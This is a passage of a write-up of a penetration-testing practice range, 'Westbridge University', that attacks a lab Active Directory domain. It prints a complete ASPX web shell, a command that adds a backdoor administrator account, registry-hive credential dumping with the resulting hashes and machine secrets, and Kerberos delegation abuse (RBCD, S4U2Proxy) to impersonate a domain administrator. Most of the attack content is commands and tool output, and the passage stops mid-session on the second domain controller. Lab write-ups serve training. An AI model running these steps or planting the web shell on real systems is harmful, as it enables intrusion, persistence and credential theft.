┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat ~/wbr/krb5.conf
[libdefaults]
default_realm = WESTBRIDGE.HSM
dns_lookup_kdc = false
dns_lookup_realm = false
udp_preference_limit = 1
rdns = false

[realms]
WESTBRIDGE.HSM = {
kdc = 10.0.10.5
admin_server = 10.0.10.5
}
WESTBRIDGE-RESEARCH.HSM = {
kdc = 10.0.20.5
admin_server = 10.0.20.5
}

[domain_realm]
.westbridge.hsm = WESTBRIDGE.HSM
westbridge.hsm = WESTBRIDGE.HSM
.westbridge-research.hsm = WESTBRIDGE-RESEARCH.HSM
westbridge-research.hsm = WESTBRIDGE-RESEARCH.HSM

[capaths]
WESTBRIDGE.HSM = {
WESTBRIDGE-RESEARCH.HSM = .
}
WESTBRIDGE-RESEARCH.HSM = {
WESTBRIDGE.HSM = .
}

Generated a Kerberos TGT for r.parker and used it to access the research WEB server via RDP, as r.parker was a member of the RESEARCH WEB RDP REMOTING group.

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5_CONFIG=~/wbr/krb5.conf KRB5CCNAME=./r.parker.ccache proxychains4 -q impacket-getST -k -no-pass -spn TERMSRV/WEB.westbridge-research.hsm -dc-ip 10.0.20.5 westbridge-research.hsm/r.parker
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[*] Saving ticket in r.parker@TERMSRV_WEB.westbridge-research.hsm@WESTBRIDGE-RESEARCH.HSM.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5_CONFIG=~/wbr/krb5.conf KRB5CCNAME=./r.parker@TERMSRV_WEB.westbridge-research.hsm@WESTBRIDGE-RESEARCH.HSM.ccache proxychains4 -q xfreerdp3 /v:WEB.westbridge-research.hsm /u:r.parker /d:westbridge-research.hsm /cert:ignore /dynamic-resolution +clipboard
Password:

During the RDP session, we identified the C:\inetpub\wwwroot directory hosting http://10.0.20.10/.

The Research Web Administrators group had write permissions over this directory, and j.bones was a member of the group. Using the compromised j.bones account, we placed a cmd.aspx webshell in the web root.

cmd.aspx web shell used

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
<%@ Page Language="C#" Debug="true" AutoEventWireup="true" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

<!DOCTYPE html>
<html>
<head>
<title>ASPX Command Executor</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<h2>Execute Command</h2>
<asp:Label ID="lblCmd" runat="server" Text="Enter Command: "></asp:Label>
<asp:TextBox ID="txtCommand" runat="server" Width="400px"></asp:TextBox>
<asp:Button ID="btnExecute" runat="server" Text="Execute" OnClick="btnExecute_Click" />
<br /><br />
<h3>Output:</h3>
<asp:Literal ID="litOutput" runat="server"></asp:Literal>
</div>
</form>
</body>
</html>

<script runat="server">
protected void btnExecute_Click(object sender, EventArgs e)
{
string command = txtCommand.Text;
if (string.IsNullOrEmpty(command)) return;

try
{
// Configure the process start settings
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";

// The /c parameter tells cmd to run the command and then terminate
psi.Arguments = "/c " + command;

// Hidden window settings required for IIS background execution
psi.RedirectStandardOutput = true;
psi.RedirectStandardError = true;
psi.UseShellExecute = false;
psi.CreateNoWindow = true;

// Start the process
using (Process p = Process.Start(psi))
{
// Read both standard output and errors
string output = p.StandardOutput.ReadToEnd();
string error = p.StandardError.ReadToEnd();
p.WaitForExit();

// Format the output safely for the HTML page
string finalResult = !string.IsNullOrEmpty(error) ? error : output;
litOutput.Text = "<pre>" + Server.HtmlEncode(finalResult) + "</pre>";
}
}
catch (Exception ex)
{
litOutput.Text = "<pre style='color:red;'>Error: " + Server.HtmlEncode(ex.Message) + "</pre>";
}
}
</script>

Obtained a shell as j.bones by leveraging the Windows runas command.

Through the webshell, we leveraged SeImpersonatePrivilege with an obfuscated SigmaPotato payload to escalate privileges to SYSTEM.

Using the elevated SYSTEM privileges obtained through Potato, we created a new hacker account on the WEB server and added it to the local Administrators and Remote Desktop Users groups, providing persistent administrative and RDP access.

Command used:

1
C:\inetpub\wwwroot> sp.exe "cmd /c net user hacker Pass123456 /add & net localgroup Administrators hacker /add & net localgroup ""Remote Desktop Users"" hacker /add"
1
2
3
PS C:\Users\Administrator\Desktop> type flag.txt
Flag06[Potato_*****]
PS C:\Users\Administrator\Desktop>


1
Flag06[Potato_*****]

Phase 9 - DC02: RBCD → S4U2Proxy → NTDS.dit

Dumping the research WEB box’s SAM/LSA (via reg save + secretsdump) yields a cached DefaultPassword belonging to the last account, a.howard, plus the WEB$ machine key:

BloodHound - a.howard → Identity Security Operators → GenericWrite → DC02 (the RBCD primitive):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
PS C:\Users\hacker> whoami /groups

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Users\hacker> cd ../
PS C:\Users> cd .\Administrator\
PS C:\Users\Administrator> cd .\Desktop\
PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/15/2026 4:55 PM 34 flag.txt


PS C:\Users\Administrator\Desktop> type .\flag.txt

Flag06[Potato_*****]
PS C:\Users\Administrator\Desktop> whoami
web\hacker
PS C:\Users\Administrator\Desktop> hostname
WEB
PS C:\Users\Administrator\Desktop>

PS C:\Users\hacker> reg save hklm\sam C:\Windows\Tasks\sam.hive
The operation completed successfully.
PS C:\Users\hacker> reg save hklm\security C:\Windows\Tasks\security.hive
The operation completed successfully.
PS C:\Users\hacker> reg save hklm\system C:\Windows\Tasks\system.hive
The operation completed successfully.
PS C:\Users\hacker> copy C:\Windows\Tasks\sam.hive \\tsclient\kali\
PS C:\Users\hacker> copy C:\Windows\Tasks\security.hive \\tsclient\kali\
PS C:\Users\hacker> copy C:\Windows\Tasks\system.hive \\tsclient\kali\
PS C:\Users\hacker>

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q nxc smb web.westbridge-research.hsm -u hacker -p Pass123456 --smb-timeout 5 --local-auth
SMB 224.0.0.1 445 WEB [*] Windows 11 / Server 2025 Build 26100 x64 (name:WEB) (domain:WEB) (signing:True) (SMBv1:None)
SMB 224.0.0.1 445 WEB [+] WEB\hacker:Pass123456

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-secretsdump -sam sam.hive -security security.hive -system system.hive LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x0819ea08ea0fe405fb12bdb5fff4d840
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e774f5e209f73c7b50dfe23776f9f53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7490f2a63d713a813eda5bf8fd1a8227:::
hacker:1000:aad3b435b51404eeaad3b435b51404ee:2ae3bb2799637b6a70abef0a349ebaad:::
[*] Dumping cached domain logon information (domain/username:hash)
WESTBRIDGE-RESEARCH.HSM/a.howard:$DCC2$10240#a.howard#06d655cd496c750af4211e7a47d3b9a2: (2026-08-26 05:55:27+00:00)
WESTBRIDGE-RESEARCH.HSM/r.parker:$DCC2$10240#r.parker#f2f98323bc988fbd4cc7dcace18418bb: (2026-08-26 07:44:16+00:00)
WESTBRIDGE-RESEARCH.HSM/j.bones:$DCC2$10240#j.bones#3e2edcd3b216cdd30319efa8f7dacd69: (2026-08-26 07:17:58+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:2a002d003b004e0025005b004f0077007a0022002b0068002e003c005d0076004e00360031003a004b004d007a0066002d003d005600430051003a00490062004e004e004b007900360063005a002f004d0040002a00610038004900590054004b00540038002400670068005300760038003100660052004e00740020006d00400031002e005100720047002600400056005f004100480027006e006a005000470045003b0026006f00330078007900440032002f005d00550020004200330055004d0063003e006d005e006f002700790066006a005b003800600036005300290031002e005a004f00670038005800
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:34f86e11de7057d31e5d65754f1912ab
[*] DefaultPassword
(Unknown User):fdCgRAxJq0lY
[*] DPAPI_SYSTEM
dpapi_machinekey:0x2a3673b46679e2c8bcc634dcef8c8ea20d5bddfe
dpapi_userkey:0xf7280c4909aaad002ed730d56af53c8502e1fd8f
[*] M$MachineBoundCertificate
0000 76 00 00 00 01 00 00 00 03 03 00 00 03 03 00 00 v...............
0010 00 00 00 00 17 00 00 00 64 00 00 00 01 00 00 00 ........d.......
0020 01 01 00 00 01 00 00 00 33 3B 49 05 26 C7 CC 69 ........3;I.&..i
0030 E2 5A E4 97 F3 ED 70 53 E1 36 59 D5 5B D2 6E CF .Z....pS.6Y.[.n.
0040 5B A3 F1 8B 2E 27 95 45 68 B0 8B DA 69 A0 34 79 [....'.Eh...i.4y
0050 B6 5A 63 9B FA 19 EC EA 01 00 00 00 00 00 00 00 .Zc.............
0060 00 00 00 00 00 00 00 00 01 00 00 00 88 02 00 00 ................
0070 4C 73 61 49 73 6F 41 73 79 6D 6D 65 74 72 69 63 LsaIsoAsymmetric
0080 4B 65 79 42 6C 6F 62 4C 15 49 70 F4 BF C1 45 D9 KeyBlobL.Ip...E.
0090 0A 28 BA 76 D6 90 F8 43 69 04 2A 06 8E DB C7 52 .(.v...Ci.*....R
00a0 27 65 73 58 B1 1D 5B 93 3C 5B 8A 74 81 99 61 60 'esX..[.<[.t..a`
00b0 00 11 A8 FB D6 35 79 FC E0 10 44 D2 8F 51 41 37 .....5y...D..QA7
00c0 76 CD 07 20 A9 0A 92 2C 99 49 89 EB 9C D4 36 6E v.. ...,.I....6n
00d0 51 F0 B9 6B 57 A4 B1 9A 6B 0B E7 DC 30 61 08 22 Q..kW...k...0a."
00e0 07 03 03 EE CE 66 C6 00 74 18 CC 01 8B 1D 51 7D .....f..t.....Q}
00f0 A1 63 C7 78 77 A5 EC D0 35 53 2A 4C 14 DE E8 EA .c.xw...5S*L....
0100 E4 A9 EE 38 7F 0B 96 5F 1A 53 6A CD 76 C2 AD EE ...8..._.Sj.v...
0110 16 98 C9 88 B9 FB 60 58 00 CA A8 D1 E6 33 22 32 ......`X.....3"2
0120 A3 F7 0A 0C 8A BC D2 7F EE B8 56 A5 0F 36 8D 3C ..........V..6.<
0130 7E F8 9C 7B E7 56 AD 63 BA 58 46 32 6A CF A5 9B ~..{.V.c.XF2j...
0140 8E F3 D6 13 22 15 E0 15 47 3B BD B8 BA 9B 32 FF ...."...G;....2.
0150 CC 3A 13 CE 7B 3E 24 35 0B C1 E0 67 E8 1D EB 25 .:..{>$5...g...%
0160 81 F7 C2 5E E5 36 95 87 43 05 41 BB 83 C4 37 16 ...^.6..C.A...7.
0170 E4 86 E8 AD 13 B2 6A 0F AD D4 80 E4 4C BC C8 73 ......j.....L..s
0180 84 B3 E4 05 E1 64 A0 B7 C0 0E 66 8E A5 DA 25 AF .....d....f...%.
0190 06 92 1F F7 EA C6 CB 53 FC 70 47 FA 89 07 DC 36 .......S.pG....6
01a0 4E 9B E3 54 CA 12 EE 5D 9A E0 47 A4 9A 90 7F 1E N..T...]..G.....
01b0 C9 1F C0 5D C2 50 88 C8 51 2B 1E 7A CB 88 A3 33 ...].P..Q+.z...3
01c0 F6 32 CE 27 E3 21 BC D5 4D F4 56 91 8B 77 E0 A6 .2.'.!..M.V..w..
01d0 7F B7 70 39 E9 02 83 88 BE 47 53 E4 CF B5 C1 71 ..p9.....GS....q
01e0 F9 63 E1 5A 7B A0 0F 2A 0B 29 8D FB 81 E4 35 13 .c.Z{..*.)....5.
01f0 08 3D A5 A3 02 F5 ED 95 8C 7D 40 B6 AF A2 62 52 .=.......}@...bR
0200 36 E2 9D 7B F0 13 74 58 06 70 B1 4B 85 70 38 CE 6..{..tX.p.K.p8.
0210 69 90 64 BE E5 17 78 27 EC AD C3 6D 0B 8D F2 9F i.d...x'...m....
0220 90 A6 13 C5 BF 1A 3B 26 E0 BC 06 39 06 9B CE 43 ......;&...9...C
0230 B3 8A 46 02 0E 48 CC 08 29 78 E9 19 3F DD 1C 7B ..F..H..)x..?..{
0240 2D A2 35 DF BD 2C D2 05 42 2A 0E 0D E0 53 CF 15 -.5..,..B*...S..
0250 50 2C 1B D7 E1 DD C4 09 C2 3A 25 8F 39 CF 39 1B P,.......:%.9.9.
0260 7E 71 E5 49 80 C0 51 9C 3D A9 2D B3 A4 DE 4D 0A ~q.I..Q.=.-...M.
0270 6C B6 8C F3 AC 4F C8 2A 0C 8E FC F1 D2 87 D5 14 l....O.*........
0280 41 7C FA C4 E0 D6 52 FB 62 8E 3B 0B 08 21 6D A3 A|....R.b.;..!m.
0290 D7 69 01 6A E8 AC C4 AD 25 71 FE 4A CD EC 27 8B .i.j....%q.J..'.
02a0 1A C3 98 65 D1 D4 97 16 CC 93 C1 E9 C0 8F 19 91 ...e............
02b0 69 F9 08 FF 7A 65 B1 11 2B 72 76 C4 76 4A 0B D7 i...ze..+rv.vJ..
02c0 FF A3 F3 F0 64 3F E0 8E 7B 2C CA D6 63 97 0B E1 ....d?..{,..c...
02d0 A2 74 2D D9 42 E0 F4 59 FB B7 5D E7 BF BE 34 12 .t-.B..Y..]...4.
02e0 52 4D 50 FC 3E D0 3C 78 93 96 29 F3 36 0C FE 5A RMP.>.<x..).6..Z
02f0 BD B8 5A 08 FB 84 FE 2B 0E 3E AF 91 C3 78 A5 A6 ..Z....+.>...x..
0300 51 68 D4 8E C9 98 5E 2E 35 10 73 53 75 FD 3A 20 Qh....^.5.sSu.:
0310 00 00 00 01 00 00 00 B9 02 00 00 30 82 02 B5 30 ...........0...0
0320 82 01 9D A0 03 02 01 02 02 01 01 30 0D 06 09 2A ...........0...*
0330 86 48 86 F7 0D 01 01 0B 05 00 30 1D 31 1B 30 19 .H........0.1.0.
0340 06 03 55 04 03 0C 12 43 4E 3D 45 43 32 41 4D 41 ..U....CN=EC2AMA
0350 5A 2D 38 49 33 47 39 48 42 30 20 17 0D 32 36 30 Z-8I3G9HB0 ..260
0360 37 30 35 30 39 32 39 31 30 5A 18 0F 32 31 32 36 705092910Z..2126
0370 30 36 31 31 30 39 32 39 31 30 5A 30 1D 31 1B 30 0611092910Z0.1.0
0380 19 06 03 55 04 03 0C 12 43 4E 3D 45 43 32 41 4D ...U....CN=EC2AM
0390 41 5A 2D 38 49 33 47 39 48 42 30 82 01 22 30 0D AZ-8I3G9HB0.."0.
03a0 06 09 2A 86 48 86 F7 0D 01 01 01 05 00 03 82 01 ..*.H...........
03b0 0F 00 30 82 01 0A 02 82 01 01 00 B2 AE 10 0E 8B ..0.............
03c0 42 72 1F F8 B0 0E 18 20 16 73 3E 79 2E BC 20 FB Br..... .s>y.. .
03d0 31 06 37 74 48 47 5B 2B 96 95 55 22 04 51 67 69 1.7tHG[+..U".Qgi
03e0 2D C7 08 58 FC F7 2B 95 0A 8B 0A BB 80 E7 D5 69 -..X..+........i
03f0 09 C9 FB 24 1B D7 E2 2B 85 5A 70 49 6B 74 A6 7D ...$...+.ZpIkt.}
0400 6A 39 CD FD 92 31 A2 E4 C2 B7 9D 64 54 94 72 5B j9...1.....dT.r[
0410 B0 34 F7 A7 D2 6B E6 0B 57 D5 1A FB 39 4B 82 20 .4...k..W...9K.
0420 1B DC B1 01 73 1A 5A 24 E4 30 2E 23 A4 7F FD A6 ....s.Z$.0.#....
0430 46 72 1B 94 47 FA 6C 2D D1 43 24 CF 3C 13 53 9F Fr..G.l-.C$.<.S.
0440 96 12 78 CC 01 33 01 36 5D 77 52 DF E0 9F FC C5 ..x..3.6]wR.....
0450 16 38 B7 07 53 D8 8C 11 53 0F 34 53 CB FF 8E 3B .8..S...S.4S...;
0460 64 04 AE 8C A3 22 9F 99 DB 96 D8 06 D0 CD 17 C6 d...."..........
0470 D6 A0 C8 0D BB 85 FA 89 50 B8 2F 56 7A 2A 9D 3F ........P./Vz*.?
0480 C7 67 B0 AF 58 76 AA 7E 4E 18 0E F1 6B 8D 76 DE .g..Xv.~N...k.v.
0490 84 D2 02 C5 64 2E 7C A2 2D 89 EA 4A CF 63 08 B6 ....d.|.-..J.c..
04a0 DB 7D E4 C7 83 C1 62 20 49 A9 E8 76 B7 2E F2 16 .}....b I..v....
04b0 BC 13 FD AA BB B5 C3 4D AB F8 8D 02 03 01 00 01 .......M........
04c0 30 0D 06 09 2A 86 48 86 F7 0D 01 01 0B 05 00 03 0...*.H.........
04d0 82 01 01 00 63 10 4D 2B 87 EF E0 79 DF A6 79 4C ....c.M+...y..yL
04e0 A6 52 7A F1 D5 8D F9 16 F6 A9 F3 60 3E 96 E2 61 .Rz........`>..a
04f0 15 8C 47 75 F9 FE 2F 46 E6 00 E8 C9 C2 51 AD 60 ..Gu../F.....Q.`
0500 06 1E DC 8C 0C C5 F5 6C 5B 17 63 C7 83 E2 B2 6C .......l[.c....l
0510 49 5C 3F 28 8B 67 8A 14 DC 41 97 1B 1D A5 6C EF I\?(.g...A....l.
0520 16 D3 DA 23 E9 DE DC 99 58 29 7E 2D 8D B4 8F 67 ...#....X)~-...g
0530 37 DC D8 56 02 7A 60 EE 9F D7 6C 2E 21 13 19 B6 7..V.z`...l.!...
0540 67 C8 E8 B4 41 23 0E 2A 24 03 A0 86 DC E1 17 B8 g...A#.*$.......
0550 D1 E1 F4 BC C3 11 81 AB 67 18 36 9E 5B CA 1B 79 ........g.6.[..y
0560 A7 4A A9 9C A9 47 B9 40 6A D9 9C AC 25 7A 5B 06 .J...G.@j...%z[.
0570 6D 3E 95 43 DA 68 2F 20 3B A3 20 EC B9 E2 EB 19 m>.C.h/ ;. .....
0580 32 92 C9 69 58 58 1C D3 6B E6 49 4C 1A D4 E7 8B 2..iXX..k.IL....
0590 0C 7D D7 0A 3B 58 15 51 38 64 96 B9 A0 D6 5D 2E .}..;X.Q8d....].
05a0 00 5E 37 CF BE 67 74 97 E0 94 09 2F D5 B2 B8 12 .^7..gt..../....
05b0 11 28 C7 1F 63 42 B0 65 E8 96 EB 92 05 36 C7 63 .(..cB.e.....6.c
05c0 6C E1 98 36 58 8C 5E FD 4D 48 A7 DE 0B CD 4E AD l..6X.^.MH....N.
05d0 33 2C 3A D2 3,:.
M$MachineBoundCertificate:76000000010000000303000003030000000000001700000064000000010000000101000001000000333b490526c7cc69e25ae497f3ed7053e13659d55bd26ecf5ba3f18b2e27954568b08bda69a03479b65a639bfa19ecea0100000000000000000000000000000001000000880200004c736149736f4173796d6d65747269634b6579426c6f624c154970f4bfc145d90a28ba76d690f84369042a068edbc75227657358b11d5b933c5b8a74819961600011a8fbd63579fce01044d28f51413776cd0720a90a922c994989eb9cd4366e51f0b96b57a4b19a6b0be7dc30610822070303eece66c6007418cc018b1d517da163c77877a5ecd035532a4c14dee8eae4a9ee387f0b965f1a536acd76c2adee1698c988b9fb605800caa8d1e6332232a3f70a0c8abcd27feeb856a50f368d3c7ef89c7be756ad63ba5846326acfa59b8ef3d6132215e015473bbdb8ba9b32ffcc3a13ce7b3e24350bc1e067e81deb2581f7c25ee5369587430541bb83c43716e486e8ad13b26a0fadd480e44cbcc87384b3e405e164a0b7c00e668ea5da25af06921ff7eac6cb53fc7047fa8907dc364e9be354ca12ee5d9ae047a49a907f1ec91fc05dc25088c8512b1e7acb88a333f632ce27e321bcd54df456918b77e0a67fb77039e9028388be4753e4cfb5c171f963e15a7ba00f2a0b298dfb81e43513083da5a302f5ed958c7d40b6afa2625236e29d7bf01374580670b14b857038ce699064bee5177827ecadc36d0b8df29f90a613c5bf1a3b26e0bc0639069bce43b38a46020e48cc082978e9193fdd1c7b2da235dfbd2cd205422a0e0de053cf15502c1bd7e1ddc409c23a258f39cf391b7e71e54980c0519c3da92db3a4de4d0a6cb68cf3ac4fc82a0c8efcf1d287d514417cfac4e0d652fb628e3b0b08216da3d769016ae8acc4ad2571fe4acdec278b1ac39865d1d49716cc93c1e9c08f199169f908ff7a65b1112b7276c4764a0bd7ffa3f3f0643fe08e7b2ccad663970be1a2742dd942e0f459fbb75de7bfbe3412524d50fc3ed03c78939629f3360cfe5abdb85a08fb84fe2b0e3eaf91c378a5a65168d48ec9985e2e3510735375fd3a2000000001000000b9020000308202b53082019da003020102020101300d06092a864886f70d01010b0500301d311b301906035504030c12434e3d454332414d415a2d384933473948423020170d3236303730353039323931305a180f32313236303631313039323931305a301d311b301906035504030c12434e3d454332414d415a2d3849334739484230820122300d06092a864886f70d01010105000382010f003082010a0282010100b2ae100e8b42721ff8b00e182016733e792ebc20fb3106377448475b2b96955522045167692dc70858fcf72b950a8b0abb80e7d56909c9fb241bd7e22b855a70496b74a67d6a39cdfd9231a2e4c2b79d645494725bb034f7a7d26be60b57d51afb394b82201bdcb101731a5a24e4302e23a47ffda646721b9447fa6c2dd14324cf3c13539f961278cc013301365d7752dfe09ffcc51638b70753d88c11530f3453cbff8e3b6404ae8ca3229f99db96d806d0cd17c6d6a0c80dbb85fa8950b82f567a2a9d3fc767b0af5876aa7e4e180ef16b8d76de84d202c5642e7ca22d89ea4acf6308b6db7de4c783c1622049a9e876b72ef216bc13fdaabbb5c34dabf88d0203010001300d06092a864886f70d01010b0500038201010063104d2b87efe079dfa6794ca6527af1d58df916f6a9f3603e96e261158c4775f9fe2f46e600e8c9c251ad60061edc8c0cc5f56c5b1763c783e2b26c495c3f288b678a14dc41971b1da56cef16d3da23e9dedc9958297e2d8db48f6737dcd856027a60ee9fd76c2e211319b667c8e8b441230e2a2403a086dce117b8d1e1f4bcc31181ab6718369e5bca1b79a74aa99ca947b9406ad99cac257a5b066d3e9543da682f203ba320ecb9e2eb193292c96958581cd36be6494c1ad4e78b0c7dd70a3b581551386496b9a0d65d2e005e37cfbe677497e094092fd5b2b8121128c71f6342b065e896eb920536c7636ce19836588c5efd4d48a7de0bcd4ead332c3ad2
[*] NL$KM
0000 D6 F9 1E BE 20 95 21 6A 88 22 1F 5C 92 CE 2C 8A .... .!j.".\..,.
0010 BB CF 2C 38 59 53 A4 3A EF A0 03 DA EA A5 A8 CF ..,8YS.:........
0020 0E 6F 91 92 02 3E 5B 45 40 E2 C7 A8 D5 DA 8B 11 .o...>[E@.......
0030 6D 77 6B 5F 3F 78 48 12 0F BF A8 CE 06 C2 C6 7C mwk_?xH........|
NL$KM:d6f91ebe2095216a88221f5c92ce2c8abbcf2c385953a43aefa003daeaa5a8cf0e6f9192023e5b4540e2c7a8d5da8b116d776b5f3f7848120fbfa8ce06c2c67c
[*] Cleaning up...

Used reg save to extract the Windows registry hives and recover password hashes. One of the recovered credentials was successfully cracked, revealing the password fdCgRAxJq0lY.

a.howard is a member of Identity Security Operators, which BloodHound shows has GenericWrite over DC02$ - the setup for Resource-Based Constrained Delegation:

1
DC02 ACE: IDENTITY SECURITY OPERATORS → GenericWrite

So: write RBCD trust on DC02$ pointing at a computer we already control (WEB$), then S4U2Proxy as WEB$ to impersonate Administrator to cifs/DC02:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ python3 -c "print(bytes.fromhex('2a002d003b004e0025005b004f0077007a0022002b0068002e003c005d0076004e00360031003a004b004d007a0066002d003d005600430051003a00490062004e004e004b007900360063005a002f004d0040002a00610038004900590054004b00540038002400670068005300760038003100660052004e00740020006d00400031002e005100720047002600400056005f004100480027006e006a005000470045003b0026006f00330078007900440032002f005d00550020004200330055004d0063003e006d005e006f002700790066006a005b003800600036005300290031002e005a004f00670038005800').decode('utf-16-le'))"
*-;N%[Owz"+h.<]vN61:KMzf-=VCQ:IbNNKy6cZ/M@*a8IYTKT8$ghSv81fRNt m@1.QrG&@V_AH'njPGE;&o3xyD2/]U B3UMc>m^o'yfj[8`6S)1.ZOg8X
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat <<'EOF' > web_pass-1.txt
*-;N%[Owz"+h.<]vN61:KMzf-=VCQ:IbNNKy6cZ/M@*a8IYTKT8$ghSv81fRNt m@1.QrG&@V_AH'njPGE;&o3xyD2/]U B3UMc>m^o'yfj[8`6S)1.ZOg8X
EOF
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5_CONFIG=~/wbr/krb5.conf proxychains4 -q impacket-rbcd -delegate-from 'WEB$' -delegate-to 'DC02$' -action write -dc-ip 10.0.20.5 -dc-host DC02.westbridge-research.hsm -k 'westbridge-research.hsm/a.howard:fdCgRAxJq0lY'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Accounts allowed to act on behalf of other identity:
[*] a.howard (S-1-5-21-2715181774-2347706061-2644861033-1113)
[*] WEB$ (S-1-5-21-2715181774-2347706061-2644861033-1101)
[*] WEB$ can already impersonate users on DC02$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] a.howard (S-1-5-21-2715181774-2347706061-2644861033-1113)
[*] WEB$ (S-1-5-21-2715181774-2347706061-2644861033-1101)
1
2
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ unset KRB5CCNAME

Using WEB$, we performed the S4U2Self/S4U2Proxy flow to obtain a Kerberos service ticket for Administrator against the CIFS service on DC02.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ read -r P < ./web_pass-1.txt; KRB5_CONFIG=~/wbr/krb5.conf proxychains4 -q impacket-getST -spn cifs/DC02.westbridge-research.hsm -impersonate Administrator -dc-ip 10.0.20.5 -k "westbridge-research.hsm/WEB\$:$P"
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC02.westbridge-research.hsm@WESTBRIDGE-RESEARCH.HSM.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5CCNAME=./Administrator@cifs_DC02.westbridge-research.hsm@WESTBRIDGE-RESEARCH.HSM.ccache proxychains4 -q impacket-smbclient -k -no-pass DC02.westbridge-research.hsm -dc-ip 10.0.20.5
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd Users
# cd Administrator
# cd Desktop
# get flag.txt
[-] SMB SessionError: code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND - The object name is not found.
# ls
drw-rw-rw- 0 Mon Jul 6 14:21:51 2026 .
drw-rw-rw- 0 Wed Aug 26 05:35:26 2026 ..
-rw-rw-rw- 282 Sat Jul 4 14:40:01 2026 desktop.ini
